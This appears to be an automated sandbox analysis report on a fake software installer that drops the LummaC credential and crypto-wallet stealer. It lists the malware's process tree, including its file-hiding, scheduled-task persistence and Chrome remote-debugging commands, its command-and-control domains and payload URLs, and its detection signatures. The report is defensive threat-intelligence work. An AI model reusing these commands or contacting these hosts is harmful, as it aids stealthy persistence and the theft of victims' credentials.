Edit tour

Windows Analysis Report
Magic_V_pro_setup_stable_latest_release_version_9_709.exe

Overview

General Information

Sample name:	Magic_V_pro_setup_stable_latest_release_version_9_709.exe
Analysis ID:	1632503
MD5:	4f4e6dd4d4b9d96e69b7f8f97e867023
SHA1:	51db1de1d11976911dee96ed18b1fc903ea16676
SHA256:	43b9bb932501d8d186d9fd49ee5fa1a1c47283e1db898a68b5c846eb7b971aee
Tags:	exeNOBISLLCuser-SquiblydooBlog
Infos:

Detection

LummaC Stealer

Score:	74
Range:	0 - 100
Confidence:	100%

Compliance

Score:	33
Range:	0 - 100

Signatures

Antivirus detection for URL or domain

Antivirus detection for dropped file

Attempt to bypass Chrome Application-Bound Encryption

Found malware configuration

Multi AV Scanner detection for dropped file

Sigma detected: Scheduled temp file as task from temp location

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

C2 URLs / IPs found in malware configuration

Deletes itself after installation

Drops password protected ZIP file

Found many strings related to Crypto-Wallets (likely being stolen)

Sample uses string decryption to hide its real strings

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to steal Crypto Currency Wallets

Uses attrib.exe to hide files

Uses schtasks.exe or at.exe to add and modify task schedules

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to communicate with device drivers

Contains functionality to detect virtual machines (SLDT)

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

EXE planting / hijacking vulnerabilities found

Enables security privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains executable resources (Code or Archives)

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Browser Started with Remote Debugging

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Schtasks From Env Var Folder

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

Magic_V_pro_setup_stable_latest_release_version_9_709.exe (PID: 8088 cmdline: "C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exe" MD5: 4F4E6DD4D4B9D96E69B7F8F97E867023)

Magic_V_pro_setup_stable_latest_release_version_9_709.tmp (PID: 6796 cmdline: "C:\Users\user\AppData\Local\Temp\is-TFCVM.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp" /SL5="$204BA,1192681,727040,C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exe" MD5: 6C66FDD38C098F271FDE6E9E74DBD0EB)

Magic_V_pro_setup_stable_latest_release_version_9_709.exe (PID: 7284 cmdline: "C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exe" /verysilent /sp- MD5: 4F4E6DD4D4B9D96E69B7F8F97E867023)

Magic_V_pro_setup_stable_latest_release_version_9_709.tmp (PID: 7964 cmdline: "C:\Users\user\AppData\Local\Temp\is-E1ELN.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp" /SL5="$304AE,1192681,727040,C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exe" /verysilent /sp- MD5: 6C66FDD38C098F271FDE6E9E74DBD0EB)

idp.exe (PID: 3620 cmdline: "C:\Users\user\AppData\Local\Temp\is-GTB58.tmp\idp.exe" x "C:\Users\user\AppData\Local\Temp\is-GTB58.tmp\logs" -o"C:\Users\user\AppData\Local\Programs\Common" -y -pCC3ba8B679c926fc9911aeDE9009E589CBD3667C48439c630418D27fDbb52Fc8 MD5: 6482EE0F372469D1190C74BD70D76153)

conhost.exe (PID: 1460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 1408 cmdline: "cmd" /c attrib +h +S "C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 1780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

attrib.exe (PID: 3384 cmdline: attrib +h +S "C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe" MD5: 0E938DD280E83B1596EC6AA48729C2B0)

schtasks.exe (PID: 2332 cmdline: "schtasks.exe" /create /xml C:\Users\user\AppData\Local\Temp\is-GTB58.tmp\lang /tn WhatsAppSyncTaskMachineCore /f MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 2112 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 3148 cmdline: "C:\Windows\system32\cmd.exe" /C ""C:\Users\user\AppData\Local\Temp\is-GTB58.tmp.cmd"" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 2812 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskshostw.exe (PID: 2444 cmdline: C:\Users\user\AppData\Local\programs\common\taskshostw.exe C:\Windows\system32\config\systemprofile\AppData\Local\programs\common\taskshostw.exe MD5: 33645B3AFD79ED29F7E6F476D7F6ED4B)

chrome.exe (PID: 4364 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory="Default" --remote-debugging-port=9222 MD5: E81F54E6C1129887AEA47E7D092680BF)

chrome.exe (PID: 4948 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1980,i,2116874388231828041,7596599948103174128,262144 --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2252 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)

chrome.exe (PID: 5508 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=printing.mojom.UnsandboxedPrintBackendHost --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1980,i,2116874388231828041,7596599948103174128,262144 --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=5208 /prefetch:8 MD5: E81F54E6C1129887AEA47E7D092680BF)

cleanup

Malware Configuration

Threatname: LummaC

{"C2 url": ["willpowerwav.site", "uncertainyelemz.bet", "hobbyedsmoker.live", "presentymusse.world", "deaddereaste.today", "subawhipnator.life", "privileggoe.live", "boltetuurked.digital"], "Build id": "ROmgOO--"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000012.00000003.2396086907.000000000088F000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000012.00000002.3144361654.0000000000400000.00000040.00000001.01000000.0000000E.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
00000012.00000003.1631758552.0000000002990000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
Process Memory Space: taskshostw.exe PID: 2444	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security

Unpacked PEs

Source	Rule	Description	Author
18.3.taskshostw.exe.2990000.0.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
18.2.taskshostw.exe.400000.0.raw.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
18.3.taskshostw.exe.2990000.0.raw.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security

Sigma Signatures

System Summary

Sigma detected: Browser Started with Remote Debugging

Source: Process started

Author: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory="Default" --remote-debugging-port=9222, CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory="Default" --remote-debugging-port=9222, CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: C:\Users\user\AppData\Local\programs\common\taskshostw.exe C:\Windows\system32\config\systemprofile\AppData\Local\programs\common\taskshostw.exe, ParentImage: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe, ParentProcessId: 2444, ParentProcessName: taskshostw.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory="Default" --remote-debugging-port=9222, ProcessId: 4364, ProcessName: chrome.exe

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "schtasks.exe" /create /xml C:\Users\user\AppData\Local\Temp\is-GTB58.tmp\lang /tn WhatsAppSyncTaskMachineCore /f, CommandLine: "schtasks.exe" /create /xml C:\Users\user\AppData\Local\Temp\is-GTB58.tmp\lang /tn WhatsAppSyncTaskMachineCore /f, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-E1ELN.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp" /SL5="$304AE,1192681,727040,C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exe" /verysilent /sp-, ParentImage: C:\Users\user\AppData\Local\Temp\is-E1ELN.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, ParentProcessId: 7964, ParentProcessName: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, ProcessCommandLine: "schtasks.exe" /create /xml C:\Users\user\AppData\Local\Temp\is-GTB58.tmp\lang /tn WhatsAppSyncTaskMachineCore /f, ProcessId: 2332, ProcessName: schtasks.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Persistence and Installation Behavior

Sigma detected: Scheduled temp file as task from temp location

Source: Process started

Author: Joe Security: Data: Command: "schtasks.exe" /create /xml C:\Users\user\AppData\Local\Temp\is-GTB58.tmp\lang /tn WhatsAppSyncTaskMachineCore /f, CommandLine: "schtasks.exe" /create /xml C:\Users\user\AppData\Local\Temp\is-GTB58.tmp\lang /tn WhatsAppSyncTaskMachineCore /f, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-E1ELN.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp" /SL5="$304AE,1192681,727040,C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exe" /verysilent /sp-, ParentImage: C:\Users\user\AppData\Local\Temp\is-E1ELN.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, ParentProcessId: 7964, ParentProcessName: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, ProcessCommandLine: "schtasks.exe" /create /xml C:\Users\user\AppData\Local\Temp\is-GTB58.tmp\lang /tn WhatsAppSyncTaskMachineCore /f, ProcessId: 2332, ProcessName: schtasks.exe

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-08T03:24:13.139658+0100	2028371	3	Unknown Traffic	192.168.2.5	49699	104.17.112.233	443	TCP
2025-03-08T03:24:15.836607+0100	2028371	3	Unknown Traffic	192.168.2.5	49700	164.132.58.105	443	TCP
2025-03-08T03:24:43.768819+0100	2028371	3	Unknown Traffic	192.168.2.5	49707	104.21.44.37	443	TCP
2025-03-08T03:24:46.298533+0100	2028371	3	Unknown Traffic	192.168.2.5	49708	104.21.44.37	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-08T03:24:44.444174+0100	2054653	1	A Network Trojan was detected	192.168.2.5	49707	104.21.44.37	443	TCP
2025-03-08T03:24:47.315069+0100	2054653	1	A Network Trojan was detected	192.168.2.5	49708	104.21.44.37	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-08T03:24:44.444174+0100	2049836	1	A Network Trojan was detected	192.168.2.5	49707	104.21.44.37	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://rea.grupolalegion.ec/$TE	Avira URL Cloud: Label: malware
Source: https://rea.grupolalegion.ec/willrandom.zipdom.	Avira URL Cloud: Label: malware
Source: https://rea.grupolalegion.ec/willrandom.zip	Avira URL Cloud: Label: malware
Source: https://willpowerwav.site/api	Avira URL Cloud: Label: malware
Source: https://rea.grupolalegion.ec/willrandom.zipo	Avira URL Cloud: Label: malware
Source: https://rea.grupolalegion.ec/willrandom.zipH	Avira URL Cloud: Label: malware
Source: https://rea.grupolalegion.ec/willrandom.zipG	Avira URL Cloud: Label: malware
Source: https://rea.grupolalegion.ec/willrandom.zipG/h	Avira URL Cloud: Label: malware
Source: https://rea.grupolalegion.ec/	Avira URL Cloud: Label: malware
Source: willpowerwav.site	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Programs\Common\willrandom.exe

Avira: detection malicious, Label: TR/AVI.Lumma.jtxjg

Found malware configuration

Source: 00000012.00000002.3144361654.0000000000400000.00000040.00000001.01000000.0000000E.sdmp

Malware Configuration Extractor: LummaC {"C2 url": ["willpowerwav.site", "uncertainyelemz.bet", "hobbyedsmoker.live", "presentymusse.world", "deaddereaste.today", "subawhipnator.life", "privileggoe.live", "boltetuurked.digital"], "Build id": "ROmgOO--"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Programs\Common\willrandom.exe

ReversingLabs: Detection: 66%

Sample uses string decryption to hide its real strings

Source: 00000012.00000002.3144361654.0000000000400000.00000040.00000001.01000000.0000000E.sdmp	String decryptor: willpowerwav.site
Source: 00000012.00000002.3144361654.0000000000400000.00000040.00000001.01000000.0000000E.sdmp	String decryptor: uncertainyelemz.bet
Source: 00000012.00000002.3144361654.0000000000400000.00000040.00000001.01000000.0000000E.sdmp	String decryptor: hobbyedsmoker.live
Source: 00000012.00000002.3144361654.0000000000400000.00000040.00000001.01000000.0000000E.sdmp	String decryptor: presentymusse.world
Source: 00000012.00000002.3144361654.0000000000400000.00000040.00000001.01000000.0000000E.sdmp	String decryptor: deaddereaste.today
Source: 00000012.00000002.3144361654.0000000000400000.00000040.00000001.01000000.0000000E.sdmp	String decryptor: subawhipnator.life
Source: 00000012.00000002.3144361654.0000000000400000.00000040.00000001.01000000.0000000E.sdmp	String decryptor: privileggoe.live
Source: 00000012.00000002.3144361654.0000000000400000.00000040.00000001.01000000.0000000E.sdmp	String decryptor: boltetuurked.digital

Privilege Escalation

EXE planting / hijacking vulnerabilities found

Source: C:\Users\user\AppData\Local\Temp\is-GTB58.tmp\idp.exe

EXE: C:\Users\user\AppData\Local\Programs\Common\willrandom.exe

Jump to behavior

Compliance

EXE planting / hijacking vulnerabilities found

Source: C:\Users\user\AppData\Local\Temp\is-GTB58.tmp\idp.exe

EXE: C:\Users\user\AppData\Local\Programs\Common\willrandom.exe

Jump to behavior

Uses 32bit PE files

Source: Magic_V_pro_setup_stable_latest_release_version_9_709.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

PE / OLE file has a valid certificate

Source: Magic_V_pro_setup_stable_latest_release_version_9_709.exe

Static PE information: certificate valid

Uses secure TLS version for HTTPS connections

Source: unknown	HTTPS traffic detected: 104.17.112.233:443 -> 192.168.2.5:49699 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 164.132.58.105:443 -> 192.168.2.5:49700 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 190.92.154.206:443 -> 192.168.2.5:49701 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 190.92.154.206:443 -> 192.168.2.5:49702 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 150.171.28.254:443 -> 192.168.2.5:49703 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.44.37:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.44.37:443 -> 192.168.2.5:49708 version: TLS 1.2

Contains modern PE file flags such as dynamic base (ASLR) or NX

Source: Magic_V_pro_setup_stable_latest_release_version_9_709.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Binary contains paths to debug symbols

Source:	Binary string: wntdll.pdbUGP source: taskshostw.exe, 00000012.00000002.3150093681.0000000004030000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: taskshostw.exe, 00000012.00000002.3150093681.0000000004030000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: f:\mydev\inno-download-plugin\unicode\idp.pdb source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000006.00000003.1339202842.0000000003610000.00000004.00001000.00020000.00000000.sdmp, idp.dll.8.dr, idp.dll.6.dr

Spreading

Source: C:\Users\user\AppData\Local\Temp\is-GTB58.tmp\idp.exe	Code function: 11_2_00DA6CE2 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW,		11_2_00DA6CE2
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 18_2_03FB3F02 lstrcpyW,lstrcpyW,lstrcatW,FindFirstFileW,PathRemoveFileSpecW,lstrcatW,lstrcmpW,lstrcmpW,lstrcatW,CreateDirectoryW,lstrcatW,lstrcatW,lstrcatW,PathRemoveFileSpecW,PathRemoveFileSpecW,lstrcatW,PathRemoveFileSpecW,PathRemoveFileSpecW,lstrcatW,lstrcatW,CopyFileExW,lstrcpyW,lstrcatW,lstrcpyW,lstrcatW,FindNextFileW,FindClose,		18_2_03FB3F02

Source: C:\Users\user\AppData\Local\Temp\is-GTB58.tmp\idp.exe

Code function: 11_2_00DA7904 __EH_prolog,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW,

11_2_00DA7904

Software Vulnerabilities

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 4x nop then cmp word ptr [edi+ebx], 0000h	18_2_004469B0
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 4x nop then mov eax, ebx	18_2_00421260
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+ecx-000000BBh]	18_2_00447A90
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 4x nop then cmp dword ptr [edx+ecx*8], 656D2358h	18_2_0041ABA1
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 4x nop then mov ecx, eax	18_2_0041ABA1
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 4x nop then lea ecx, dword ptr [eax+eax]	18_2_00444C00
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 4x nop then movzx ebp, byte ptr [esp+edi+078CCBDEh]	18_2_004475C0
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 4x nop then lea ecx, dword ptr [eax+27h]	18_2_0041DD90
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 93A82FD1h	18_2_0041DD90
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 4x nop then lea ecx, dword ptr [eax+27h]	18_2_0041DD90
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+esi+0Ch]	18_2_0043F640
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 4x nop then mov ecx, eax	18_2_0043F640
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+esi]	18_2_00446040
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 4x nop then push dword ptr [esi+14h]	18_2_0041083A
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 4x nop then mov ecx, eax	18_2_0041083A
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 4x nop then movzx esi, byte ptr [ebx+ecx-000000D2h]	18_2_0042F8C9
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 4x nop then mov ecx, eax	18_2_004298F0
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax+02h]	18_2_0044108A
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 93A82FD1h	18_2_004400A0
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 4x nop then movzx edx, byte ptr [eax]	18_2_004400A0
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 720EEED4h	18_2_00443100
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-2809052Bh]	18_2_00443100
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 4x nop then movzx edx, byte ptr [esp+esi+27577599h]	18_2_00443100
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 4x nop then mov byte ptr [eax], cl	18_2_0041D12C
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 4x nop then cmp word ptr [edi+eax+02h], 0000h	18_2_0041D12C
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]	18_2_0040A1A0
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 4x nop then mov word ptr [eax], cx	18_2_004201AB
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 4x nop then movzx esi, byte ptr [esp+edx+140AC537h]	18_2_00445A52
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 4x nop then mov byte ptr [eax], cl	18_2_0041C221
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 4x nop then cmp word ptr [edi+eax+02h], 0000h	18_2_0041C221
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 4x nop then movzx edi, byte ptr [esp+eax+38h]	18_2_0042D23F
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 4x nop then mov ecx, eax	18_2_004232C0
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	18_2_0043CAD0
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 4x nop then mov dword ptr [esp+08h], edi	18_2_00433ADD
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 4x nop then mov ecx, eax	18_2_0042C2E0
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], esi	18_2_00446AE0
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+578BD47Eh]	18_2_0040FAFA
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 4x nop then movzx esi, byte ptr [esp+edx+02h]	18_2_00440A80
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax+02h]	18_2_00440A80
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 4x nop then mov ecx, eax	18_2_0040EB00
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx+02h]	18_2_00426380
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 4x nop then mov ecx, eax	18_2_00429BA0
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-72CBAB97h]	18_2_0041FBB0
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 4x nop then mov edx, ecx	18_2_0042C3BD
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 4x nop then mov ecx, eax	18_2_0042C3BD
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 4x nop then mov ebx, ecx	18_2_00444C40
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 4x nop then lea ecx, dword ptr [eax+eax]	18_2_00444C40
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 4x nop then push esi	18_2_00425453
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 4x nop then mov word ptr [esi], cx	18_2_00424C60
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 4x nop then mov byte ptr [ecx], bl	18_2_0043347A
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 4x nop then mov eax, edx	18_2_00423400
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 4x nop then mov word ptr [ecx], dx	18_2_00447CB0
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 4x nop then mov ecx, eax	18_2_00429D50
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 4x nop then movzx esi, byte ptr [edx]	18_2_00445553
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 4x nop then movzx ecx, byte ptr [esi+eax-2809055Fh]	18_2_00411D78
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 4x nop then jmp dword ptr [0044EA9Ch]	18_2_0042E534
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 4x nop then movzx esi, byte ptr [edx]	18_2_004025A0
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 4x nop then mov ecx, eax	18_2_00411E6A
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 4x nop then movzx ecx, byte ptr [ebx+eax-7Dh]	18_2_00411605
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 4x nop then movzx edx, byte ptr [esi+eax+27DDFCF1h]	18_2_0042BE06
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 4x nop then movsx eax, byte ptr [esi+ecx]	18_2_00418E80
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 4x nop then movzx edi, byte ptr [esp+eax+06h]	18_2_004206A0
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+20h]	18_2_0041A757
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 4x nop then movzx edi, byte ptr [ecx+esi]	18_2_00402770
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 4x nop then cmp dword ptr [ebx+esi*8], CA198B66h	18_2_0042BF10
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	18_2_0042FF10
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 4x nop then movzx edx, byte ptr [ebp+eax-000000ECh]	18_2_0042B7C8
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 4x nop then mov byte ptr [edi], al	18_2_00433FCE
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 4x nop then movzx esi, byte ptr [esp+edx+00000170h]	18_2_00433FCE
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 4x nop then movzx ebx, byte ptr [edi+ecx-70AAEE47h]	18_2_00411FF7
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 4x nop then mov byte ptr [edi], al	18_2_00433FCC
